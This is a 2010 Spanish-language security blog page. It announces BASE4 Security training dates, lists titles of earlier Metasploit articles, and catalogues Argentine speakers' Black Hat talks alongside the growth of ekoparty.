Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 1 de agosto de 2010

Kung-FOO de la Semana #004

Termino una semana bastante movida a nivel laboral, parece ser que con tantos hackers en Las Vegas el trabajo se incremento mucho :P


BASE4 Security presento varios trainings nuevos, como "Asegurando Arquitecturas Mobile Corporativas", en donde se presentan las mejores prácticas de seguridad para implementar en forma segura cada uno de los diferentes sistemas operativos mobile existentes en el mercado.

También continua abierto el concurso para ganarse una vacante gratuita al "WiFu COMBAT training", el nuevo training de wireless hacking que se presentará por primera vez a fines de Agosto en Buenos Aires. Participá!

A continuación les dejo el calendario de las próximas fechas:

COMBAT Training 2.0
- Buenos Aires: 2 al 6 de Agosto
- Panamá: 4 al 8 de Octubre
- Bogotá: 25 al 29 de Octubre

WiFu COMBAT Training
- Buenos Aires: 24 al 26 de Agosto
- Bogotá: 9 al 11 de Noviembre

Asegurando Arquitecturas Mobile Corporativas
- Buenos Aires: 22 y 23 de Septiembre
- Bogotá: 28 y 29 de Septiembre

Para consultas sobre otras fechas de los trainings, o ediciones en otros países, contactarse con Sol Argento: sargento@base4sec.com

sábado, 31 de julio de 2010

Recopilación de Artículos de Metasploit

Revisando las estadísticas de este blog, siempre encuentro artículos de Metasploit como los más leídos, así que aquí les dejo una recopilación de algunos de estos.

También les recomiendo una excelente recopilación anual que hizo DragonJAR sobre "Lo mejor de Kungfoosion.com" :)

- Explotando "LNK" con MetaSploit
- MetaSploit con Microsoft Word
- Ataque USB U3 con MetaSploit
- Embebiendo un Ejecutable dentro de un PDF con MetaSploit
- Ingeniería Social con Applets firmados de Java en MetaSploit
- Jugando con NeXpose y MetaSploit
- Meterpreter x Tres!
- Obteniendo una Shell de Meterpreter
- Pivoting en MetaSploit con portfwd
- Explotando el 0-day de Adobe Reader
- Prefetch en Meterpreter
- Karmetasploit en BackTrack 4
- Pivoting con MetaSploit

Aprovecho para agradecer a todos los amigos que leen este blog, que por primera vez superan los 1000 lectores de RSS!! Gracias a todos por el apoyo continuo :)


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 26 de julio de 2010

Curiosidades de Speakers Argentinos en Black Hat y ekoparty

Mirando los archivos de la Black Hat, es interesante observar como fue creciendo el research argentino, y quienes han sido los pioneros en este campo en nuestro país.

Quiero aclarar que hay muchos investigadores argentinos que han publicado sus trabajos en otras excelentes conferencias alrededor del mundo, pero probablemente Black Hat sea la CON más representativa de todas.


En este gráfico, se pueden observar la cantidad de "charlas" por año, en todas las Black Hat (USA, Europe, DC, etc.) basado en el archivo de la conferencia. Sepan disculpar cualquier error u omisión! :)

La primer Black Hat nació en 1997, y solamente 4 años mas tarde ya teníamos representantes de nuestro país, sin duda quienes han impulsado el research en nuestro país hasta el día de hoy.

Este es el listado histórico de charlas en la Black Hat:

2001
- Iván Arce & Max Caceres - (Black Hat USA) -
  Automated Penetration Testing

2002
- Maximiliano Caceres - (Black Hat USA)
  Syscall Proxying

2003
- Gerardo Richarte - (Black Hat USA)
  Modern Intrusion Practices
- Cesar Cerrudo & Aaron Newman - (Black Hat Windows Security)
  Hunting Flaws in MS SQL Server

2004
- Cesar Cerrudo - (Black Hat Windows Security)
  Auditing ActiveX Controls

2005
- Esteban Martínez Fayó - (Black Hat USA)
  Advanced SQL Injection in Oracle Databases
- Cesar Cerrudo - (Black Hat USA)
  Demystifying MS SQL Server & Oracle Database Server Security
- Cesar Cerrudo - (Black Hat Europe)
  Hacking Windows Internals

2006
- Cesar Cerrudo - (Black Hat Europe)
  WLSI - Windows Local Shellcode Injection
- Cesar Cerrudo - (Black Hat DC)
  Client Side Penetration Testing - Black Hat Federal 2006

2007
- Ezequiel D. Gutesman & Ariel Waissbein - (Black Hat USA)
  A Dynamic Technique for Enhancing the Security and Privacy of Web Applications
- Alfredo Ortega - (Black Hat USA)
  OpenBSD Remote Exploit
- Ariel Waissbein & Damian Saura - (Black Hat USA)
  Timing Attacks for Recovering Private Entries From Database Engines
- Cesar Cerrudo & Esteban Martinez Fayo - (Black Hat Europe)
  Hacking Databases for Owning Your Data
- Mariano Nuñez Di Croce - (Black Hat Europe)
  Attacking the Giants: Exploiting SAP Internals - Black Hat Europe 2007
- Cesar Cerrudo - (Black Hat DC)
  Practical 10 Minute Security Audit: The Oracle Case

2008
- Luciano Bello, Maximiliano Bertacchini - (Black Hat USA)
  Predictable RNG in the Vulnerable Debian OpenSSL package, the What and the How
- Ariel Futoransky - (Black Hat USA)
  Viral Infections in Cisco IOS

2009
- Cesar Cerrudo - (Black Hat DC)
  SQL Server Anti-Forensics
- Mariano Nunez Di Croce - (Black Hat Europe)
  SAP Penetration Testing
- Alfredo Ortega, Anibal Sacco - (Black Hat USA)
  Deactivate the Rootkit

2010
(lo que hay publicado hasta ahora)
- Cesar Cerrudo - (Black Hat USA)
  Token Kidnapping's Revenge
- Mariano Nuñez Di Croce - (Black Hat USA)
  SAP Backdoors: A ghost at the heart of your business
- Esteban Martínez Fayó - (Black Hat USA)
  Hacking and protecting Oracle Database Vault
- Leandro Meiners, Diego Sor - (Black Hat USA)
  WPA Migration Mode: WEP is back to haunt you...
- Hernan Ochoa, Agustin Azubel - (Black Hat USA)
  Understanding the Windows SMB NTLM Weak Nonce vulnerability
- Nicolas Waisman - (Black Hat USA)
  Aleatory Persistent Threat
- Jorge Luis Alvarez Medina - (Black Hat DC)
  Internet Explorer turns your personal computer into a public file server
- Mariano Nuñez Di Croce - (Black Hat Europe)
  SAP Backdoors: A ghost at the heart of your business


Por otro lado, también es interesante observar como se fueron internacionalizando las presentaciones de la ekoparty:




A medida que la conferencia fue creciendo, también fueron llegando speakers de otras partes del mundo. Pero mas allá de la cuestión presupuestaria, sin una cantidad de researchers locales tan importante, sería imposible organizar una conferencia como ekoparty.

Aprovecho para agradecer enormemente a todos los researchers locales que constantemente apoyan la ekoparty! :)


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

LinkWithin